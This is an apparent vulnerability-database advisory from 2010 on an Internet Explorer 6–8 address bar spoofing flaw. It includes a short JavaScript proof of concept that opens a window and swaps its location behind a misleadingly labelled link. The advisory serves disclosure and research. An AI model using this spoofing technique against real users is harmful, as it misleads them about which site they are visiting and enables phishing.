IE Address Bar Spoofing Vulnerability

  • Posted in
  • Vulndb

Published: 2010-07-24
Affected versions: IE6/7/8
Description:
Reference
<* http://Securitylab.ir/Advisories *>

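Test method:
The programs (methods) provided by this site may be offensive in nature; they are for security research and teaching purposes only. Use at your own risk!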

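<script>
// Proof of concept from the advisory: opens a new window with the address bar
// shown, then immediately replaces that window's location with a second site.
function Spoof() {
  var pd = window.open('http://www.yahoo.com', '', 'location=1');
  pd.location.replace('http://www.microsoft.com/');
}
</script>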
<p align="center">
<b><font face="Calibri">Internet Explorer Address Bar Spoofing Vulnerability
(IE8,IE7,IE6)</font></b></p>
<p align="center">
&nbsp;</p>
<p align="center">
&nbsp;</p>
<p align="center">
&nbsp;</p>
<p align="center">
&nbsp;</p>
<p align="center">
<a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font face="Calibri" size="2">
---------------------------------------------------------------------</font></p>
<p align="center"><font size="2" face="Calibri">Discovered by: Pouya Daneshmand&nbsp;
Securitylab.ir</font></p>
<p align="center"><font face="Calibri" size="2">
---------------------------------------------------------------------</font></p>

Security recommendation:
Wait for a patch.